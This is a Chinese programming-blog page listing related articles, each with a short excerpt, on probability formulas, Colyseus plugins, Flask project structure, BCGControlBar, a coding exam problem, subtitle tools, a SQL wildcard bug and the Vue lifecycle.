http://www.ppmy.cn/embedded/149623.html

相关文章

概率论基础知识点公式汇总

概率论基础知识点公式汇总

1 概率论的基本概念 1.1 随机事件 样本空间 S S S&#xff1a;将随机实验所有可能的记过组成的集合称为样本空间。样本点&#xff1a;样本空间的每个结果称为样本点。随机试验、随机事件 E E E、基本事件、必然事件、不可能事件、对立事件 A A ‾ A\overline{A} AA、古典概型…
阅读更多...
Colyseus 插件及工具介绍

Colyseus 插件及工具介绍

Colyseus 插件及工具介绍 Colyseus 提供了多种官方插件和工具,帮助开发者更高效地构建、扩展和优化多人游戏服务器。这些插件包括监控、存储、数据库集成以及第三方工具的支持。 官方插件和工具 1. @colyseus/monitor 功能: 用于实时监控服务器状态,包括房间、玩家连接、服…
阅读更多...
flask后端开发(10):问答平台项目结构搭建

flask后端开发(10):问答平台项目结构搭建

目录 一、项目结构二、具体各个部分 解耦合 一、项目结构 zhiliaooa/ ├── pycache/ ├── blueprints/ # 蓝图目录 │ ├── forms.py # 表单定义 │ ├── qa.py # 问答相关视图 │ └── user.py # 用户相关视图 │ ├── static/ # 静态文件 │ ├── css/ │ ├─…
阅读更多...
MFC扩展库BCGControlBar Pro v36.0 - 可视化管理器等全新升级

MFC扩展库BCGControlBar Pro v36.0 - 可视化管理器等全新升级

BCGControlBar库拥有500多个经过全面设计、测试和充分记录的MFC扩展类。 我们的组件可以轻松地集成到您的应用程序中&#xff0c;并为您节省数百个开发和调试时间。 BCGControlBar专业版 v36.0已全新发布了&#xff0c;这个版本改进网格控件的性能、增强工具栏编辑器功能等&am…
阅读更多...
华为OD E卷(100分)38-数组拼接

华为OD E卷(100分)38-数组拼接

前言 工作了十几年&#xff0c;从普通的研发工程师一路成长为研发经理、研发总监。临近40岁&#xff0c;本想辞职后换一个相对稳定的工作环境一直干到老, 没想到离职后三个多月了还没找到工作&#xff0c;愁肠百结。为了让自己有点事情做&#xff0c;也算提高一下自己的编程能力…
阅读更多...
视频字幕生成工具(类似 MemoAI)简介

视频字幕生成工具(类似 MemoAI)简介

视频字幕生成工具,像你提到的那样,利用 机器学习 和 自然语言处理 技术来为视频内容自动生成字幕,并支持多种语言的翻译。这些工具在很多领域中非常有用,尤其是在教育、媒体制作、内容创作和跨语言交流中。 主要功能: 语音识别(ASR): 自动转录:工具首先会识别视频中的…
阅读更多...
下划线表示任意单个字符引发的bug

下划线表示任意单个字符引发的bug

遇到一个奇葩的bug&#xff01;&#xff01;&#xff01; 功能是模糊搜索&#xff1a;列表中有一条数据“IMSCM-CM_PMS_ORDER” 使用“IMSCM_”&#xff08;这里是下划线&#xff0c;数据为中划线&#xff09;进行搜索&#xff0c;竟然可以搜索出这条数据&#xff01;&#x…
阅读更多...
vue 的生命周期

vue 的生命周期

一、创建阶段&#xff08;BeforeCreate、Created&#xff09; 1. BeforeCreate 这是组件实例刚被创建时触发的第一个生命周期钩子。此时&#xff0c;组件的data和methods等选项还没有被初始化&#xff0c;数据观察&#xff08;watch&#xff09;和事件/生命周期方法也尚未被设…
阅读更多...
最新文章

Copyright @ 2022~2023